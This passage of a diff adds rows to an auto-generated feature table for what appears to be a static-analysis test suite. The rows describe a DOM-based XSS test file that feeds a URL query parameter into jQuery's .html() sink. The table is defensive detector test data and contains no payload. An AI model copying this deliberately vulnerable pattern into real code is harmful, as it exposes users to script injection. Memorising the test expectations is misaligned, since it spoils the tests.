translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | exceptional return of anonymous function | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | functio ... ')]);\\n} | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | functio ... ')]);\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | functio ... ')]);\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | return of anonymous function | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:1:2:12:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:2:15 | translate | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:2:15 | translate | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:2:15 | translate | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:2:15 | translate | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:2:15 | translate | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | transla ... nt"\\n } | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | transla ... nt"\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | transla ... nt"\\n } | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | transla ... nt"\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | transla ... nt"\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | translate | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | translate | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | translate | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | translate | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:2:7:5:3 | translate | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:2:19:5:3 | {\\n " ... nt"\\n } | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:2:19:5:3 | {\\n " ... nt"\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:2:19:5:3 | {\\n " ... nt"\\n } | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:2:19:5:3 | {\\n " ... nt"\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:2:19:5:3 | {\\n " ... nt"\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:14 | "own goal" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:14 | "own goal" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:14 | "own goal" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:14 | "own goal" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:14 | "own goal" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:3:5:3:26 | "own go ... ckpass" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:3:17:3:26 | "backpass" | assignedToPropName | own goal | +| autogenerated/Xss/DomBasedXss/translate.js:3:17:3:26 | "backpass" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:3:17:3:26 | "backpass" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:3:17:3:26 | "backpass" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:3:17:3:26 | "backpass" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:3:17:3:26 | "backpass" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:12 | "fumble" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:12 | "fumble" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:12 | "fumble" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:12 | "fumble" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:12 | "fumble" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:4:5:4:21 | "fumble": "feint" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:4:15:4:21 | "feint" | assignedToPropName | fumble | +| autogenerated/Xss/DomBasedXss/translate.js:4:15:4:21 | "feint" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:4:15:4:21 | "feint" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:4:15:4:21 | "feint" | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:4:15:4:21 | "feint" | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:4:15:4:21 | "feint" | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:12 | target | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:12 | target | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:12 | target | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:12 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target ... .search | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target ... .search | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target ... .search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:7:6:39 | target ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:23 | document | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:23 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:32 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:32 | document.location | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:32 | document.location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:39 | documen ... .search | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:39 | documen ... .search | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:39 | documen ... .search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:16:6:39 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:25:6:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:25:6:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:6:25:6:32 | location | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:25:6:32 | location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:25:6:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:6:34:6:39 | search | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:6:34:6:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:6:34:6:39 | search | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:6:34:6:39 | search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:6:34:6:39 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:18 | searchParams | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:18 | searchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:18 | searchParams | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:18 | searchParams | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:18 | searchParams | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchP ... ing(1)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchP ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchP ... ing(1)) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchP ... ing(1)) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchP ... ing(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchParams | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchParams | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchParams | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchParams | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:7:7:61 | searchParams | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | exceptional return of new URL ... ing(1)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | exceptional return of new URL ... ing(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | exceptional return of new URL ... ing(1)) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | exceptional return of new URL ... ing(1)) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | exceptional return of new URL ... ing(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | new URL ... ing(1)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | new URL ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | new URL ... ing(1)) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | new URL ... ing(1)) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:22:7:61 | new URL ... ing(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:26:7:40 | URLSearchParams | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:26:7:40 | URLSearchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:7:26:7:40 | URLSearchParams | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:26:7:40 | URLSearchParams | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:26:7:40 | URLSearchParams | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:47 | target | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:47 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:47 | target | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:47 | target | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:47 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:57 | target.substring | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:57 | target.substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:57 | target.substring | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:57 | target.substring | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:57 | target.substring | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | exceptional return of target.substring(1) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | exceptional return of target.substring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | exceptional return of target.substring(1) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | exceptional return of target.substring(1) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | exceptional return of target.substring(1) | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | target.substring(1) | CalleeFlexibleAccessPath | URLSearchParams | | autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | target.substring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | target.substring(1) | contextFunctionInterfaces | | @@ -15591,6 +110504,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | target.substring(1) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | | autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | target.substring(1) | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:7:42:7:60 | target.substring(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:7:49:7:57 | substring | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:7:49:7:57 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:7:49:7:57 | substring | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:7:49:7:57 | substring | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:7:49:7:57 | substring | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:7:59:7:59 | 1 | CalleeFlexibleAccessPath | target.substring | | autogenerated/Xss/DomBasedXss/translate.js:7:59:7:59 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:7:59:7:59 | 1 | contextFunctionInterfaces | | @@ -15599,6 +110517,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:7:59:7:59 | 1 | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:7:59:7:59 | 1 | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:7:59:7:59 | 1 | receiverName | target | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:3 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:3 | $ | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | $('original-term') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | $('original-term') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | $('original-term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | $('original-term') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | $('original-term') | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | exceptional return of $('original-term') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | exceptional return of $('original-term') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | exceptional return of $('original-term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | exceptional return of $('original-term') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:20 | exceptional return of $('original-term') | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:25 | $('orig ... ').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:25 | $('orig ... ').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:25 | $('orig ... ').html | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:25 | $('orig ... ').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:25 | $('orig ... ').html | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | $('orig ... term')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | $('orig ... term')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | $('orig ... term')) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | $('orig ... term')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | $('orig ... term')) | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | exceptional return of $('orig ... term')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | exceptional return of $('orig ... term')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | exceptional return of $('orig ... term')) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | exceptional return of $('orig ... term')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:3:9:51 | exceptional return of $('orig ... term')) | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:9:5:9:19 | 'original-term' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/translate.js:9:5:9:19 | 'original-term' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:9:5:9:19 | 'original-term' | contextFunctionInterfaces | | @@ -15606,6 +110554,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:9:5:9:19 | 'original-term' | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | | autogenerated/Xss/DomBasedXss/translate.js:9:5:9:19 | 'original-term' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:9:5:9:19 | 'original-term' | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:22:9:25 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:22:9:25 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:22:9:25 | html | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:22:9:25 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:22:9:25 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:38 | searchParams | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:38 | searchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:38 | searchParams | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:38 | searchParams | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:38 | searchParams | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:42 | searchParams.get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:42 | searchParams.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:42 | searchParams.get | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:42 | searchParams.get | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:42 | searchParams.get | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | exceptional return of searchP ... 'term') | contextFunctionInterfaces | | +| 